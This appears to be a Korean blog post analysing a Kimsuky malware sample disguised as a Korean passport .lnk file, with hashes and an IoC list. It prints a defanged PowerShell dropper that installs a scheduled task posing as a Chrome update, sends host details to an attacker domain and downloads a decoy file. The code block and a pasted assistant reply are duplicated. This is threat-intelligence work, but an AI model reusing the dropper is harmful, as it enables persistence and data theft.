김수키(Kimsuky) 조직 여권 위장 공격:개인정보 탈취를 위한 악성코드 분석(2025.6.18)
Contents
오늘은 김수키(Kimsuky) 조직 여권 위장 공격: 개인정보 탈취를 위한 악성코드 분석(2025.6.18)에 대해 알아보겠습니다. 해당 공격은 개인이 컴퓨터, 노트북, 스마트폰에서 찍어서 저장돼 있던 해킹을 통해서 해당 한국 여권 사진을 악용해서 다른 사람을 공격하는 데 사용이 된 것으로 추측되며 아니면 여권 사진을 취급하는 쪽에서 털렸거나…. 여러 가지 가정을 있을 수가 있을 것 같습니다. 여기서 휴대폰 개통한 곳은 아닐 것이고 그쪽은 내국인은 휴대폰 개통은 불가이기 때문이 아닐 것이고….
일단 내부 코드는 Base64 로 3번 인코딩돼 있어서 더운 여름에 짜증이 나기 시작~
파일명: 한국 여권.lnk<-가제
사이즈:1 MB
MD5:c0b47dc97cf9552b564cb227b6de12c3
SHA-1:3480dd059adb53a6be9d063d16f6f22692c009d1
SHA-256:0e75a7d2077c13eb5c8b1329ea3b254d56b1b9210bacf5998ead7c17e62d1247
각각 마다 인코딩을 앞서 이야기한 것처럼 3번 벗겨야 함
먼저 처음 것을 벗겨 보면 다음과 같습니다.
$data = "dmFy!!!!!!!;
$fname = $env:APP(D)ATA + "\Microsoft\Windows\Templates\chromeupdate(.)js";
[IO.File]::WriteAll(B)ytes($fname, [Convert]::FromBase64String($data));
$magi = "cmd /c schtasks /create /sc minu(t)e /mo 1 /tn 'Google (C)hrome Update'
/tr 'wscript(.)exe " + $fname + "' /f";
IEX $magi;
$c(l)ient = New(-)Object System.Net.WebClient;
$url = "hxxp://knees(.)nidnaver(.)cloud/free0510/view(.)php?name="+$env:C(O)MPUTER
NAME+"&tp="+[Environ(m)ent]::O(S)Version;
$fname = $env:USERP(R)OFILE + '\AppData\Local\Temp\Template(.)pdf';
$client(.)Dow(n)loadFile($url, $fname);
Start-Process ((Res(o)lve-Path $fname).Path);
분석 시작
아주 흥미로운 PowerShell 스크립트를 분석해주셨네요. 해당 스크립트는 **전형적인 드롭퍼(Dropper) 및 백도어 설치**와 정보 탈취, 그리고 지속성(Persistence) …
일단 내부 코드는 Base64 로 3번 인코딩돼 있어서 더운 여름에 짜증이 나기 시작~
파일명: 한국 여권.lnk<-가제
사이즈:1 MB
MD5:c0b47dc97cf9552b564cb227b6de12c3
SHA-1:3480dd059adb53a6be9d063d16f6f22692c009d1
SHA-256:0e75a7d2077c13eb5c8b1329ea3b254d56b1b9210bacf5998ead7c17e62d1247
각각 마다 인코딩을 앞서 이야기한 것처럼 3번 벗겨야 함
먼저 처음 것을 벗겨 보면 다음과 같습니다.
$data = "dmFy!!!!!!!;
$fname = $env:APP(D)ATA + "\Microsoft\Windows\Templates\chromeupdate(.)js";
[IO.File]::WriteAll(B)ytes($fname, [Convert]::FromBase64String($data));
$magi = "cmd /c schtasks /create /sc minu(t)e /mo 1 /tn 'Google (C)hrome Update'
/tr 'wscript(.)exe " + $fname + "' /f";
IEX $magi;
$c(l)ient = New(-)Object System.Net.WebClient;
$url = "hxxp://knees(.)nidnaver(.)cloud/free0510/view(.)php?name="+$env:C(O)MPUTER
NAME+"&tp="+[Environ(m)ent]::O(S)Version;
$fname = $env:USERP(R)OFILE + '\AppData\Local\Temp\Template(.)pdf';
$client(.)Dow(n)loadFile($url, $fname);
Start-Process ((Res(o)lve-Path $fname).Path);
분석 시작
아주 흥미로운 PowerShell 스크립트를 분석해주셨네요. 해당 스크립트는 **전형적인 드롭퍼(Dropper) 및 백도어 설치**와 정보 탈취, 그리고 지속성(Persistence) …
IoC
c0b47dc97cf9552b564cb227b6de12c3
0e75a7d2077c13eb5c8b1329ea3b254d56b1b9210bacf5998ead7c17e62d1247
3480dd059adb53a6be9d063d16f6f22692c009d1
0e75a7d2077c13eb5c8b1329ea3b254d56b1b9210bacf5998ead7c17e62d1247
3480dd059adb53a6be9d063d16f6f22692c009d1